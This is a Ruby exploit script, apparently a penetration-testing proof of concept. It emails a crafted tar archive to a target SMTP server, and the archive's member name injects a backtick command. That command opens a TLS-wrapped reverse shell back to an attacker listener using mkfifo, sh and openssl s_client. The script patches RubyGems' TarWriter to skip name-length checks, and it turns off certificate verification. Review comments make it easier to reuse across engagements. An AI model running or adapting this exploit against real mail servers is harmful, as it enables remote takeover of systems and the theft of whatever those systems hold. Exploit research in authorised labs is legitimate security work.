require 'base64'
require 'mail'
require 'net/smtp'
require 'rubygems/package'
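# Target / listener configuration.
#
# RHOST        SMTP host that receives the crafted mail (first CLI argument,
#              default 192.168.1.42).
# LHOST:LPORT  Where the reverse shell connects back. Previously hard-coded;
#              now overridable as the second/third CLI arguments with the same
#              defaults, so the script no longer needs editing per engagement.
# TARGET_EMAIL Recipient mailbox on the target.
#
# NOTE(review): the recipient address in this listing looks scraper-mangled
# ("[email protected]"); it must be replaced with a real mailbox on the
# target before the script is useful.
RHOST = ARGV[0] || '192.168.1.42'
LHOST = ARGV[1] || '192.168.1.10'
LPORT = ARGV[2] || '9001'
TARGET_EMAIL = "[email protected]"

# Reverse shell: an interactive sh fed through a FIFO and piped into
# `openssl s_client`, so the callback to LHOST:LPORT is TLS-wrapped and the
# listener on that side has to speak TLS. setsid detaches the shell from the
# parent that processes the mail.
CMD = "setsid sh -c \"mkfifo /tmp/p;sh -i </tmp/p 2>&1|openssl s_client -quiet -connect #{LHOST}:#{LPORT} >/tmp/p 2>/dev/null;rm /tmp/p\""

# The tar entry *name* is the injection vector: CMD is wrapped in backticks
# inside single quotes so that it executes wherever the target interpolates
# the archive member name into a shell command. The resulting name is well
# over the ustar 100-byte name field, which is why TarWriter#split_name is
# overridden below.
PAYLOAD = "'`#{CMD}`'"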
# Monkey-patch Gem::Package::TarWriter#split_name.
#
# A ustar header stores an entry name as a 100-byte `name` field plus an
# optional 155-byte `prefix`; readers rebuild the path as "#{prefix}/#{name}".
# Upstream (lib/rubygems/package/tar_writer.rb) performs the same split as
# below but raises Gem::Package::TooLongFileName when the pieces cannot be made
# to fit. This PoC deliberately drops those raises because the entry name *is*
# the payload and the writer must not refuse it.
#
# NOTE(review): with the checks gone, a name that still exceeds 100 bytes (or a
# prefix over 155) is no longer rejected; the header pack format (a100/a155)
# will silently truncate it instead. A payload that cannot be split on "/" will
# therefore be corrupted rather than fail loudly -- inspect the produced archive
# whenever the command changes shape.
class Gem::Package::TarWriter
  # Returns [name, prefix] for the ustar header, without length enforcement.
  def split_name(name)
    return [name, ""] unless name.bytesize > 100

    # -1 keeps empty trailing components ("foo/bar/" -> ["foo", "bar", ""]).
    components = name.split("/", -1)
    tail = components.pop
    head = components.join("/")
    # Move components from the prefix back into the name until the prefix fits
    # and the name is non-empty, or there is nothing left to move.
    until components.empty? || (head.bytesize <= 155 && !tail.empty?)
      tail = "#{components.pop}/#{tail}"
      head = components.join("/")
    end
    [tail, head]
  end
end
# Build a random string of `number` ASCII letters ([A-Za-z]). Used for
# throwaway archive names, sender addresses and filler content.
# Backed by Array#sample, i.e. not cryptographically random -- fine for
# uniqueness, not for secrets.
def rand_str(number)
  letters = [*'A'..'Z', *'a'..'z']
  Array.new(number) { letters.sample }.join
end
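# Write `files_and_contents` ({ entry_name => body String }) to `output_file`
# as a ustar archive via rubygems' TarWriter. Every entry is a regular file
# with mode 0644 and its name is used verbatim -- for this PoC the name is the
# payload, the body is filler.
#
# Fix: the size passed to add_file_simple must be the *byte* length of the
# body. String#length counts characters, so a non-ASCII body would declare too
# few bytes and TarWriter would raise FileOverflow when the extra bytes are
# written.
def tar(files_and_contents, output_file)
  puts "[+] Creating tar file: #{output_file}"
  File.open(output_file, "wb") do |file|
    # Block form closes the writer (and writes the end-of-archive padding).
    Gem::Package::TarWriter.new(file) do |writer|
      files_and_contents.each do |entry_name, body|
        writer.add_file_simple(entry_name, 0o644, body.bytesize) do |io|
          io.write(body)
        end
      end
    end
  end
end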
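# Delete the scratch archive once it has been sent. Does nothing if the file
# is already gone.
#
# Fix: File.exists? was deprecated and removed in Ruby 3.2, so the original
# raised NoMethodError on current interpreters. Deleting and rescuing ENOENT
# also avoids the check-then-delete race of the exist?/delete pair.
def cleanup(filename)
  puts "[+] cleaning up"
  File.delete(filename)
rescue Errno::ENOENT
  # never created or already removed -- nothing to do
end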
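# Deliver a mail carrying `attachment` to `target_email` through the SMTP
# server at `addr`. The port was hard-coded to 25; it is now the `port:`
# keyword with the same default, so existing callers are unaffected.
# The sender is a random local part at a throwaway domain so each run looks
# distinct in the target's logs.
#
# Mail.defaults configures the mail gem's process-wide delivery settings, so
# any later Mail.deliver in this process will use the same server.
#
# NOTE: openssl_verify_mode 'none' disables certificate verification for
# STARTTLS. That is intentional for a lab target with a self-signed cert, but
# it is a MITM exposure if this is ever pointed at anything else.
def sendmail(addr, target_email, attachment, port: 25)
  src_addr = rand_str(8)
  Mail.defaults do
    delivery_method :smtp, {
      :address => addr,
      :port => port,
      :openssl_verify_mode => 'none'
    }
  end
  puts "[+] sending mail"
  # The block is evaluated in the mail gem's context, but the locals above are
  # still visible as closure captures.
  Mail.deliver do
    from "#{src_addr}@lol.tst"
    to target_email
    subject "Email with attachment - #{src_addr}"
    body "Hello world"
    add_file attachment
  end
end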
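# Entry point: build a one-entry tar whose member *name* is PAYLOAD (the body
# is random filler), mail it to the target, then remove the local copy.
# The archive is removed in an ensure block so that a failed SMTP delivery
# does not leave a file named after the payload in the working directory.
files = {
  PAYLOAD => rand_str(32),
}
OUTFILE = "#{rand_str(8)}.tar"
begin
  tar(files, OUTFILE)
  sendmail(RHOST, TARGET_EMAIL, OUTFILE)
ensure
  cleanup(OUTFILE)
end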